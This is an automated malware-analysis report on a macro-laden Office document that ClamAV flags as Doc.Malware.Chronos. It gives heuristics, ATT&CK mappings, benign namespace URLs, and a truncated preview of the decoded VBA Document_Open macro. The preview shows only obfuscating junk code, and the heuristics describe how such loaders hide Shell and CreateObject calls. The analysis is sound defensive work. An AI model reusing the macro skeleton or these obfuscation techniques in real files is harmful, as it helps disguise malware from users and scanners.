MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample contains a critical OLE_VBA_SHELL heuristic indicating the use of the Shell() function, and a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic suggesting an obfuscated auto-exec loader. The Document_Open macro is present and likely responsible for executing the obfuscated code. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' further confirms its malicious nature. The VBA code appears to be designed to download and execute a second-stage payload.
Heuristics (7)

- ClamAV: Doc.Malware.Chronos-6897935-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

| URL | Where found |
|---|---|
| http://ns.adobe.com/xap/1.0/ | In document text (OLE body) |
| http://www.w3.org/1999/02/22-rdf-syntax-ns# | In document text (OLE body) |
| http://ns.adobe.com/photoshop/1.0/ | In document text (OLE body) |
| http://purl.org/dc/elements/1.1/ | In document text (OLE body) |
| http://ns.adobe.com/xap/1.0/mm/ | In document text (OLE body) |
| http://ns.adobe.com/xap/1.0/sType/ResourceEvent# | In document text (OLE body) |
| http://ns.adobe.com/xap/1.0/sType/ResourceRef# | In document text (OLE body) |
| http://schemas.openxmlformats.org/drawingml/2006/main | In document text (OLE body) |

All of the extracted URLs are XML namespace identifiers (XMP, RDF, Dublin Core, Photoshop and DrawingML schemas) carried in embedded image and document metadata, not download locations; they should not be treated as network indicators for this sample.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39008 bytes | bdd04a1b6b3b6e9af97749d8d1594d137daa84ccd7bb69f0b9f76d0d711e0656 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    ' Every If below compares unequal constants (e.g. 86 - 6285 = -6199, never 2205252),
    ' so its body is dead code, and the Replace/StrReverse results are assigned but never read.
    ' This is junk padding; the real string decoder and its sink are not visible in this preview.
    If 2205252 = 86 - 6285 Then
        VHxrv = Replace("jByMCyHzCxcuYJh", "jByM", "HedasGp")
        VHxrv = StrReverse("jByMCyHzCxcuYJh")
    End If
    jSHQan = StrReverse("tQnedmPjxiYh")
    If 1693535 = 107 - 2568 Then
        VgSWG = Replace("JiIkJnfThhUdRJm", "JiIk", "SzbQUfe")
        VgSWG = StrReverse("JiIkJnfThhUdRJm")
    End If
    DqAwSB = Replace("LFxxMZOSnTWp", "LFx", "mvWRIJt")
    If 680168 = 205 - 3593 Then
        RwfYF = Replace("EEbBtCSlxIs", "EEb", "XyedM")
        RwfYF = StrReverse("EEbBtCSlxIs")
        RnfMb = Replace("WBRSrzxoHiKmTa", "WBRS", "pdEvHT")
        RnfMb = StrReverse("WBRSrzxoHiKmTa")
    End If
    fcshdX = Replace("ATFIucpxMT", "ATFI", "KyRm")
    If 3620233 = 166 - 3787 Then
        SpzAg = Replace("jhxScFSFqDPmLG", "jhxS", "aXuLgL")
        SpzAg = StrReverse("jhxScFSFqDPmLG")
    End If
    hpeowW = Replace("xJMruOrsrYnJUUw", "xJMr", "tJKDG")
    For uLiIP = 0 To 329
        If 1951127 = 120 - 3990 Then
            yeLYa = Replace("FtDXebhATCsaeYF", "FtDX", "XrPjzA")
            yeLYa = StrReverse("FtDXebhATCsaeYF")
            kOEIB = Replace("WdIbfPiwZljt", "WdI", "GvLBD")
            kOEIB = StrReverse("WdIbfPiwZljt")
        End If
        If 2552869 = 204 - 4543 Then
            goryT = Replace("JcFxLrWoeJDpf", "JcFx", "PZPMYRP")
            goryT = StrReverse("JcFxLrWoeJDpf")
        End If
        lyPk = Replace("zusIcnQXcyPjWvzD", "zus", "ZudwmRX")
        lyPk = StrReverse("QmZIunbneRHOkn")
        lyPk = Replace("TxjqkODhUbURAqV", "Txjq", "sOIV")
        lyPk = Replace("QUeEnhtKCUAyP", "QUeE", "HEzvbW")
        lyPk = StrReverse("xkWruzZyCFBZOxOd")
        lyPk = Replace("pEkYGRSBKlMEbwYQxyI", "pEk", "lJcMrE")
        lyPk = StrReverse("xgMSjvPFuVdYH")
        If 665004 = 10 - 2369 Then
            hZYSB = Replace("xjOdeoMBufv", "xjO", "uAGFvj")
            hZYSB = StrReverse("xjOdeoMBufv")
        End If
        lyPk = StrReverse("wgVLBxutymHoiHA")
        lyPk = StrReverse("oPkzmwnEcPiyJLCkS")
        lyPk = StrReverse("GSlSOFfPmWsuD")
        lyPk = Replace("ciQsfyLwnWwxgwFXV", "ciQs", "BFivFE")
        lyPk = StrReverse("WGXgxQCHojuaP")
        lyPk = StrReverse("qRXPOBKiHyY")
        If 2080466 = 20 - 1834 Then
            QsFdw = Replace("gVhVEzdyWzUzJvLL", "gVhV", "uroTnkU")
            QsFdw = StrReverse("gVhVEzdyWzUzJvLL")
        End If
        lyPk = Replace("dgZbYofvLLF", "dgZb", "VmeRgqP")
        lyPk = Replace("ioPUWQQfHpHHeEYu", "ioPU", "JqEtbz")
        lyPk = StrReverse("bBQOBBiZtZFycTdWRGu")
        lyPk = StrReverse("IxaTgLXIpXVi")
        lyPk = Replace("ohjWJywhvL", "ohj", "zxKu")
        lyPk = Replace("SDZgTXfycAyqanmQlX", "SDZ", "QypXXdj")
        If 382194 = 181 - 1494 Then
            IqqRL = Replace("wJqylmXYudUnPqxhFq", "wJq", "LWGP")
            IqqRL = StrReverse("wJqylmXYudUnPqxhFq")
            PXAsI = Replace("HokXpsvPcJ", "HokX", "zUzuAED")
            PXAsI = StrReverse("HokXpsvPcJ")
        End If
        If 2661879 = 164 - 6982 Then
            VXcmm = Replace("BpLtEPahJKZrfpT", "BpLt", "CnIPWSE")
            VXcmm = StrReverse("BpLtEPahJKZrfpT")
        End If
    Next uLiIP
    For bQMIm = 0 To 292
        UoXe = StrReverse("GFrEmZkqtI")
        UoXe = Replace("AkKpjsAZcSE", "AkK", "VDzv")
        UoXe = StrReverse("ImczyFHuxprq")
        UoXe = StrReverse("YWXMRpcCDITfctXE")
        UoXe = StrReverse("ZzlchwbdjueHMom")
        UoXe = StrReverse("hGaALIyeDYqyf")
        UoXe = StrReverse("sGZMRRyidtWItSzP")
        UoXe = StrReverse("GwcCqUTCaRnGsRCZ")
        UoXe = Replace("zMXBbPbgSUTZ", "zMXB", "tuhfReh")
... (truncated)
```